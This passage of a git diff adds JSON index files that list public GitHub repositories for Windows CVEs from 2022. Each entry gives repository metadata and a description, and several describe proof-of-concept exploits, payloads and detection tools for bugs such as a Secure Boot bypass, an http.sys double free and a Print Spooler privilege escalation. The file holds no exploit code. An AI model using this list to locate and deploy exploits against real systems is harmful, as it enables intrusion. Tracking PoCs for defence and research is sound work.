"https:\/\/github.com\/dishfwk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dishfwk\/CVE-2022-21882", + "description": null, + "fork": false, + "created_at": "2023-04-21T06:14:06Z", + "updated_at": "2023-04-21T06:15:47Z", + "pushed_at": "2023-04-26T11:01:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21894.json b/2022/CVE-2022-21894.json new file mode 100644 index 0000000000..8e4b9716d9 --- /dev/null +++ b/2022/CVE-2022-21894.json @@ -0,0 +1,196 @@ +[ + { + "id": 523015625, + "name": "CVE-2022-21894", + "full_name": "Wack0\/CVE-2022-21894", + "owner": { + "login": "Wack0", + "id": 2650838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2650838?v=4", + "html_url": "https:\/\/github.com\/Wack0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wack0\/CVE-2022-21894", + "description": "baton drop (CVE-2022-21894): Secure Boot Security Feature Bypass Vulnerability", + "fork": false, + "created_at": "2022-08-09T15:53:48Z", + "updated_at": "2024-11-25T16:12:01Z", + "pushed_at": "2023-09-27T06:44:27Z", + "stargazers_count": 313, + "watchers_count": 313, + "has_discussions": false, + "forks_count": 61, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21894", + "cve-2023-24932", + "poc", + "secure-boot", + "uefi", + "vulnerability", + "windows-boot" + ], + "visibility": "public", + "forks": 61, + "watchers": 313, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 526405651, + "name": "CVE-2022-21894-Payload", + "full_name": "ASkyeye\/CVE-2022-21894-Payload", + "owner": { + "login": "ASkyeye", + "id": 50972716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50972716?v=4", + "html_url": "https:\/\/github.com\/ASkyeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASkyeye\/CVE-2022-21894-Payload", + "description": "Example payload for CVE-2022-21894", + "fork": false, + "created_at": "2022-08-18T23:45:47Z", + "updated_at": "2024-07-16T03:40:35Z", + "pushed_at": "2023-09-27T06:18:45Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 612635950, + "name": "batondrop_armv7", + "full_name": "Wack0\/batondrop_armv7", + "owner": { + "login": "Wack0", + "id": 2650838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2650838?v=4", + "html_url": "https:\/\/github.com\/Wack0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wack0\/batondrop_armv7", + "description": "An implementation of baton drop (CVE-2022-21894) for armv7 (MSM8960)", + "fork": false, + "created_at": "2023-03-11T14:38:13Z", + "updated_at": "2024-10-14T17:11:20Z", + "pushed_at": "2023-03-11T14:46:39Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 626737095, + "name": "BlackLotusDetection", + "full_name": "bakedmuffinman\/BlackLotusDetection", + "owner": { + "login": "bakedmuffinman", + "id": 28766981, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28766981?v=4", + "html_url": "https:\/\/github.com\/bakedmuffinman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bakedmuffinman\/BlackLotusDetection", + "description": "Created to help detect IOCs for CVE-2022-21894: The BlackLotus campaign", + "fork": false, + "created_at": "2023-04-12T04:05:42Z", + "updated_at": "2023-04-12T04:06:54Z", + "pushed_at": "2023-04-12T04:13:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 626751306, + "name": "BlackLotus-Detection", + "full_name": "qjawls2003\/BlackLotus-Detection", + "owner": { + "login": "qjawls2003", + "id": 35247051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35247051?v=4", + "html_url": "https:\/\/github.com\/qjawls2003", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qjawls2003\/BlackLotus-Detection", + "description": "Public repo for anything CVE-2022-21894", + "fork": false, + "created_at": "2023-04-12T05:01:50Z", + "updated_at": "2023-04-12T05:15:56Z", + "pushed_at": "2023-04-12T05:31:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 696622822, + "name": "CVE-2022-21894-Payload-New", + "full_name": "nova-master\/CVE-2022-21894-Payload-New", + "owner": { + "login": "nova-master", + "id": 129145316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129145316?v=4", + "html_url": "https:\/\/github.com\/nova-master", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nova-master\/CVE-2022-21894-Payload-New", + "description": null, + "fork": false, + "created_at": "2023-09-26T05:52:36Z", + "updated_at": "2024-01-04T04:15:51Z", + "pushed_at": "2023-09-26T06:01:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21907.json b/2022/CVE-2022-21907.json new file mode 100644 index 0000000000..028d63fded --- /dev/null +++ b/2022/CVE-2022-21907.json @@ -0,0 +1,543 @@ +[ + { + "id": 446683592, + "name": "cve-2022-21907", + "full_name": "corelight\/cve-2022-21907", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/cve-2022-21907", + "description": "cve-2022-21907", + "fork": false, + "created_at": "2022-01-11T05:00:55Z", + "updated_at": "2024-10-14T14:34:14Z", + "pushed_at": "2024-10-14T14:32:46Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 448387955, + "name": "CVE-2022-21907", + "full_name": "mauricelambert\/CVE-2022-21907", + "owner": { + "login": "mauricelambert", + "id": 50479118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4", + "html_url": "https:\/\/github.com\/mauricelambert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mauricelambert\/CVE-2022-21907", + "description": "CVE-2022-21907: detection, protection, exploitation and demonstration. Exploitation: Powershell, Python, Ruby, NMAP and Metasploit. Detection and protection: Powershell. Demonstration: Youtube.", + "fork": false, + "created_at": "2022-01-15T20:50:25Z", + "updated_at": "2024-04-09T12:36:06Z", + "pushed_at": "2022-03-07T19:45:22Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bluescreen", + "crash", + "cve", + "cve-2022-21907", + "denial-of-service", + "detection", + "dos", + "exploit", + "iis", + "metasploit", + "microsoft", + "nmap", + "payload", + "powershell", + "protection", + "python3", + "ruby", + "vulnerability", + "webserver" + ], + "visibility": "public", + "forks": 11, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 448729790, + "name": "CVE-2022-21907", + "full_name": "ZZ-SOCMAP\/CVE-2022-21907", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2022-21907", + "description": "HTTP Protocol Stack Remote Code Execution Vulnerability CVE-2022-21907", + "fork": false, + "created_at": "2022-01-17T02:28:50Z", + "updated_at": "2024-11-02T16:24:21Z", + "pushed_at": "2022-01-20T02:07:59Z", + "stargazers_count": 361, + "watchers_count": 361, + "has_discussions": false, + "forks_count": 98, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 98, + "watchers": 361, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 448909871, + "name": "CVE-2022-21907", + "full_name": "xiska62314\/CVE-2022-21907", + "owner": { + "login": "xiska62314", + "id": 97891523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97891523?v=4", + "html_url": "https:\/\/github.com\/xiska62314", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiska62314\/CVE-2022-21907", + "description": "CVE-2022-21907", + "fork": false, + "created_at": "2022-01-17T13:42:44Z", + "updated_at": "2022-01-17T13:42:44Z", + "pushed_at": "2022-01-17T13:42:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448952968, + "name": "CVE-2022-21907-http.sys", + "full_name": "p0dalirius\/CVE-2022-21907-http.sys", + "owner": { + "login": "p0dalirius", + "id": 79218792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79218792?v=4", + "html_url": "https:\/\/github.com\/p0dalirius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0dalirius\/CVE-2022-21907-http.sys", + "description": "Proof of concept of CVE-2022-21907 Double Free in http.sys driver, triggering a kernel crash on IIS servers", + "fork": false, + "created_at": "2022-01-17T15:42:37Z", + "updated_at": "2024-09-15T23:34:02Z", + "pushed_at": "2024-03-16T08:26:06Z", + "stargazers_count": 79, + "watchers_count": 79, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "crash", + "cve-2022-21907", + "iis-server", + "poc", + "python", + "rce" + ], + "visibility": "public", + "forks": 16, + "watchers": 79, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 451128086, + "name": "CVE-2022-21907-Vulnerability-PoC", + "full_name": "michelep\/CVE-2022-21907-Vulnerability-PoC", + "owner": { + "login": "michelep", + "id": 1425559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1425559?v=4", + "html_url": "https:\/\/github.com\/michelep", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michelep\/CVE-2022-21907-Vulnerability-PoC", + "description": "CVE-2022-21907 Vulnerability PoC", + "fork": false, + "created_at": "2022-01-23T14:25:12Z", + "updated_at": "2024-08-14T13:35:29Z", + "pushed_at": "2022-01-23T14:28:54Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 27, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 477659433, + "name": "CVE-2022-21907", + "full_name": "polakow\/CVE-2022-21907", + "owner": { + "login": "polakow", + "id": 53662773, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53662773?v=4", + "html_url": "https:\/\/github.com\/polakow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/polakow\/CVE-2022-21907", + "description": "A REAL DoS exploit for CVE-2022-21907", + "fork": false, + "created_at": "2022-04-04T10:53:28Z", + "updated_at": "2024-08-28T04:34:59Z", + "pushed_at": "2022-04-13T05:48:04Z", + "stargazers_count": 129, + "watchers_count": 129, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 129, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 482340383, + "name": "nmap-CVE-2022-21907", + "full_name": "gpiechnik2\/nmap-CVE-2022-21907", + "owner": { + "login": "gpiechnik2", + "id": 48253270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48253270?v=4", + "html_url": "https:\/\/github.com\/gpiechnik2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gpiechnik2\/nmap-CVE-2022-21907", + "description": "Repository containing nse script for vulnerability CVE-2022-21907. It is a component (IIS) vulnerability on Windows. It allows remote code execution. The vulnerability affects the kernel module http. sys, which handles most basic IIS operations.", + "fork": false, + "created_at": "2022-04-16T19:13:27Z", + "updated_at": "2022-08-30T10:49:35Z", + "pushed_at": "2022-04-16T20:31:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21907", + "nmap", + "nse", + "script", + "vuln", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490768227, + "name": "cve-2022-21907-http.sys", + "full_name": "iveresk\/cve-2022-21907-http.sys", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/cve-2022-21907-http.sys", + "description": "An unauthenticated attacker can send an HTTP request with an \"Accept-Encoding\" HTTP request header triggering a double free in the unknown coding-list inside the HTTP Protocol Stack (http.sys) to process packets, resulting in a kernel crash.", + "fork": false, + "created_at": "2022-05-10T16:00:50Z", + "updated_at": "2022-05-22T07:39:33Z", + "pushed_at": "2022-05-24T12:40:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 492939533, + "name": "cve-2022-21907", + "full_name": "iveresk\/cve-2022-21907", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/cve-2022-21907", + "description": "Multithread Golang application", + "fork": false, + "created_at": "2022-05-16T17:42:45Z", + "updated_at": "2022-07-03T17:01:53Z", + "pushed_at": "2022-06-10T10:02:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 559316245, + "name": "CVE-2022-21907", + "full_name": "Malwareman007\/CVE-2022-21907", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-21907", + "description": "POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability.", + "fork": false, + "created_at": "2022-10-29T18:25:26Z", + "updated_at": "2024-08-04T15:19:31Z", + "pushed_at": "2024-08-04T15:19:55Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21907", + "exploit", + "http", + "http-protocol", + "poc", + "remote-code-execution", + "security", + "security-tools", + "vulnerability", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 4, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 569183785, + "name": "Home-Demolisher", + "full_name": "0xmaximus\/Home-Demolisher", + "owner": { + "login": "0xmaximus", + "id": 63053441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63053441?v=4", + "html_url": "https:\/\/github.com\/0xmaximus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xmaximus\/Home-Demolisher", + "description": "PoC for CVE-2021-31166 and CVE-2022-21907", + "fork": false, + "created_at": "2022-11-22T09:10:36Z", + "updated_at": "2024-10-03T05:16:45Z", + "pushed_at": "2022-12-08T11:05:50Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 632224259, + "name": "CVE-2022-21907", + "full_name": "cassie0206\/CVE-2022-21907", + "owner": { + "login": "cassie0206", + "id": 90564331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90564331?v=4", + "html_url": "https:\/\/github.com\/cassie0206", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cassie0206\/CVE-2022-21907", + "description": "2022 Spring Prof. 謝續平", + "fork": false, + "created_at": "2023-04-25T01:13:51Z", + "updated_at": "2023-05-17T08:52:27Z", + "pushed_at": "2023-06-25T07:11:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 637001964, + "name": "CVE-2022-21907-RCE", + "full_name": "EzoomE\/CVE-2022-21907-RCE", + "owner": { + "login": "EzoomE", + "id": 99851303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99851303?v=4", + "html_url": "https:\/\/github.com\/EzoomE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EzoomE\/CVE-2022-21907-RCE", + "description": "CVE-2022-21907漏洞RCE PoC", + "fork": false, + "created_at": "2023-05-06T07:50:08Z", + "updated_at": "2023-05-06T07:50:53Z", + "pushed_at": "2023-05-22T03:14:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 679736679, + "name": "CVE-2022-21907", + "full_name": "asepsaepdin\/CVE-2022-21907", + "owner": { + "login": "asepsaepdin", + "id": 122620685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4", + "html_url": "https:\/\/github.com\/asepsaepdin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2022-21907", + "description": null, + "fork": false, + "created_at": "2023-08-17T13:58:00Z", + "updated_at": "2023-08-17T14:12:38Z", + "pushed_at": "2023-09-03T15:14:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 729648780, + "name": "CVE-2022-21907", + "full_name": "kamal-marouane\/CVE-2022-21907", + "owner": { + "login": "kamal-marouane", + "id": 110986028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110986028?v=4", + "html_url": "https:\/\/github.com\/kamal-marouane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kamal-marouane\/CVE-2022-21907", + "description": "Vulnerability in HTTP Protocol Stack Enabling Remote Code Execution and Potential System Crash.", + "fork": false, + "created_at": "2023-12-09T22:26:49Z", + "updated_at": "2023-12-11T20:32:49Z", + "pushed_at": "2024-01-19T04:04:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21970.json b/2022/CVE-2022-21970.json new file mode 100644 index 0000000000..c10bdc4601 --- /dev/null +++ b/2022/CVE-2022-21970.json @@ -0,0 +1,43 @@ +[ + { + "id": 555037494, + "name": "CVE-2022-21970", + "full_name": "Malwareman007\/CVE-2022-21970", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-21970", + "description": "POC OF CVE-2022-21970", + "fork": false, + "created_at": "2022-10-20T20:55:28Z", + "updated_at": "2023-12-11T12:51:40Z", + "pushed_at": "2022-10-20T21:02:17Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "chromium", + "cve-2022-21970", + "javascript", + "malware", + "microsoft", + "microsoft-edge", + "privelage-escalation", + "security", + "vulnerabilities" + ], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21971.json b/2022/CVE-2022-21971.json new file mode 100644 index 0000000000..19855fb16f --- /dev/null +++ b/2022/CVE-2022-21971.json @@ -0,0 +1,110 @@ +[ + { + "id": 463960612, + "name": "CVE-2022-21971", + "full_name": "0vercl0k\/CVE-2022-21971", + "owner": { + "login": "0vercl0k", + "id": 1476421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4", + "html_url": "https:\/\/github.com\/0vercl0k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2022-21971", + "description": "PoC for CVE-2022-21971 \"Windows Runtime Remote Code Execution Vulnerability\"", + "fork": false, + "created_at": "2022-02-26T20:37:42Z", + "updated_at": "2024-11-15T16:45:11Z", + "pushed_at": "2022-02-26T20:45:19Z", + "stargazers_count": 307, + "watchers_count": 307, + "has_discussions": false, + "forks_count": 64, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "com", + "cve-2022-21971", + "memory-corruption", + "office", + "oleload", + "rtf" + ], + "visibility": "public", + "forks": 64, + "watchers": 307, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 481903403, + "name": "CVE-2022-21971-Windows-Runtime-RCE", + "full_name": "tufanturhan\/CVE-2022-21971-Windows-Runtime-RCE", + "owner": { + "login": "tufanturhan", + "id": 49189594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49189594?v=4", + "html_url": "https:\/\/github.com\/tufanturhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tufanturhan\/CVE-2022-21971-Windows-Runtime-RCE", + "description": null, + "fork": false, + "created_at": "2022-04-15T09:14:22Z", + "updated_at": "2023-06-12T18:19:54Z", + "pushed_at": "2022-04-15T09:14:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 547436435, + "name": "CVE-2022-21971", + "full_name": "Malwareman007\/CVE-2022-21971", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-21971", + "description": "POC Of CVE-2022-21971 ", + "fork": false, + "created_at": "2022-10-07T17:25:03Z", + "updated_at": "2023-05-06T12:15:03Z", + "pushed_at": "2022-10-07T17:27:56Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-21971", + "microsoftword", + "pointer", + "prauthproviders", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21974.json b/2022/CVE-2022-21974.json new file mode 100644 index 0000000000..c915667a71 --- /dev/null +++ b/2022/CVE-2022-21974.json @@ -0,0 +1,41 @@ +[ + { + "id": 463939926, + "name": "CVE-2022-21974", + "full_name": "0vercl0k\/CVE-2022-21974", + "owner": { + "login": "0vercl0k", + "id": 1476421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4", + "html_url": "https:\/\/github.com\/0vercl0k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2022-21974", + "description": "PoC for CVE-2022-21974 \"Roaming Security Rights Management Services Remote Code Execution Vulnerability\"", + "fork": false, + "created_at": "2022-02-26T18:53:56Z", + "updated_at": "2024-11-15T16:45:13Z", + "pushed_at": "2022-02-26T19:12:12Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "com", + "cve-2022-21974", + "memory-corruption", + "office", + "oleload", + "rtf", + "wordpad" + ], + "visibility": "public", + "forks": 12, + "watchers": 59, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21984.json b/2022/CVE-2022-21984.json new file mode 100644 index 0000000000..1b26ae8a5f --- /dev/null +++ b/2022/CVE-2022-21984.json @@ -0,0 +1,33 @@ +[ + { + "id": 489434412, + "name": "CVE-2022-21984", + "full_name": "u201424348\/CVE-2022-21984", + "owner": { + "login": "u201424348", + "id": 102343181, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102343181?v=4", + "html_url": "https:\/\/github.com\/u201424348", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/u201424348\/CVE-2022-21984", + "description": null, + "fork": false, + "created_at": "2022-05-06T17:08:43Z", + "updated_at": "2022-05-06T17:08:43Z", + "pushed_at": "2022-05-06T17:08:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21999.json b/2022/CVE-2022-21999.json new file mode 100644 index 0000000000..55534eb2cd --- /dev/null +++ b/2022/CVE-2022-21999.json @@ -0,0 +1,36 @@ +[ + { + "id": 457033886, + "name": "SpoolFool", + "full_name": "ly4k\/SpoolFool", + "owner": { + "login": "ly4k", + "id": 53348818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4", + "html_url": "https:\/\/github.com\/ly4k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly4k\/SpoolFool", + "description": "Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)", + "fork": false, + "created_at": "2022-02-08T17:25:44Z", + "updated_at": "2024-11-12T16:58:37Z", + "pushed_at": "2022-02-09T16:54:09Z", + "stargazers_count": 773, + "watchers_count": 773, + "has_discussions": false, + "forks_count": 160, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21999", + "cve-2022-22718" + ], + "visibility": "public", + "forks": 160, + "watchers": 773, + "score": 0, + "subscribers_count": 15 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22029.json b/2022/CVE-2022-22029.json new file mode 100644 index 0000000000..a5d70b5ae0 --- /dev/null +++ b/2022/CVE-2022-22029.json @@ -0,0 +1,33 @@ +[ + { + "id": 515059719, + "name": "CVE-2022-22029-NFS-Server-", + "full_name": "mchoudhary15\/CVE-2022-22029-NFS-Server-", + "owner": { + "login": "mchoudhary15", + "id": 105639627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105639627?v=4", + "html_url": "https:\/\/github.com\/mchoudhary15", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mchoudhary15\/CVE-2022-22029-NFS-Server-", + "description": null, + "fork": false, + "created_at": "2022-07-18T06:23:53Z", + "updated_at": "2024-08-12T20:25:11Z", + "pushed_at": "2022-07-18T06:28:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22057.json b/2022/CVE-2022-22057.json new file mode 100644 index 0000000000..f482758f0a --- /dev/null +++ b/2022/CVE-2022-22057.json @@ -0,0 +1,33 @@ +[ + { + "id": 664855267, + "name": 